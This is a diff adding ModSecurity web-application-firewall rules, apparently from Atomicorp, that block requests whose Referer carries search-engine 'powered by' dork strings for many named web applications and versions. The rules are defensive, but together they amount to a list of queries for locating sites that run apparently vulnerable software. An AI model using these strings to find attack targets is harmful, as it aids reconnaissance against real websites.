+SecRule REQUEST_HEADERS:Referer   "powered by tsep - the search engine project" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372373,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by xhp cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372380,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by freewebshop\.org 2\.2\.1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372381,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by plogger! -plogger\.org" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372382,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by imgallery" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372383,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "help \* contact \* imprint \* sitemap \| powered by papoo \| powered by cms papoo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372384,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by webspell" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372385,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php advanced transfer manager v1\.30" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372387,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by mojoportal" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372390,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by mdforum" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372392,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by alitalk" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372394,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php icalendar" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372395,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: arab portal v2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372396,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by cpcommerce" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372399,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by yourtube" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372400,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by wikyblog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372401,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by phpnuke\.ir" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372404,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "site powered by limbo cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372406,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by pligg \+ legal: license and source" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372408,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by pmos help desk" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372409,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by burning board -exploit -johnny" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372411,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by claroline -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372414,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by upb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372416,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by leap" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372418,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by lifetype rss 0\.90 rss 1\.0 rss 2\.0 valid xhtml 1\.0 strict and css" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372419,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by pppblog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372421,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by burning board lite 1\.0\.2 or powered by burning board 2\.3\.6" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372423,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by seditio" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372425,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by visinia" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372427,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by loudblog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372428,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php director 0\.2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372434,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by shutter v0\.1\.1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372435,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by pc4uploader  v9\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372437,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by jmdcms\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372439,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by lore 1\.5\.6" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372440,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by jamm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372442,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by upb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372445,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dodo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372451,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by ucenter 1\.5\.0 © 2001 - 2008 comsenz inc\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372456,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by grayscale blog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372457,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered:powered by cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372458,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by clantiger" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372461,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by wpquiz" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by phpfanbase" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372464,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by elvin bug tracking server\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372466,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by punbb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by projectcms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by f3site" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372471,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by online grades" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by lightneasy" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php f1 \(max" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php live! v3\.3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php f1 \(max" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372480,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by cms\.ge" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372485,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by myphp forum v3\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372486,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by aqua cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372489,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dreamaccount 3\.1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372495,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by forums w-agora" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372497,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by ninja designs this is a port of wordpress" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372502,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by online grades" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372508,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by iscripts eswap\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372509,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by bp blog 6\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372512,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by 2532\|gigs v1\.2\.2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372513,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "by geeklog created this page in \+seconds \+powered" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372515,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by vbulletin 3\.8\.6" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372516,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "software directory powered by softdirec 1\.05" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372517,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by slaed cms © 2005-2008 slaed\. all rights reserved\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372521,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by gbook mx v4\.1\.0 ©2003 magtrb soft" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372524,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by albinator" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372525,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by mobilelib gold v3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372533,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by phpdug version 2\.0\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372535,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by nukedit" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372537,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by x10media\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372542,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: aih v2\.1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372545,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by qt-cute v1\.2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372556,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dorsacms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372557,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by projectcms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372558,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: radbids gold v4" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372561,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by ijoomla news portal" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372564,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by atomic photo album 1\.1\.0pre4" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372568,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by comersus v6 shopping cart" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372569,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by cmscout \(c\)2005 cmscout group" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372572,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: radlance v7\.5" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372579,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by scripteen free image hosting script v1\.2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372582,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by teamcal pro" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372588,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by marinet" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372590,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by orbis cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372594,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by hashe" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372597,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: aih v2\.3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372604,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by freewebshop" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372608,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by  www\.aspportal\.net" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372611,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by bigace 2\.4" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372614,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by amcms3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372616,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by digital college 1\.0 - magtrb soft 2010" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372617,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by phpcc beta 4\.2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372620,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by minb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372621,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
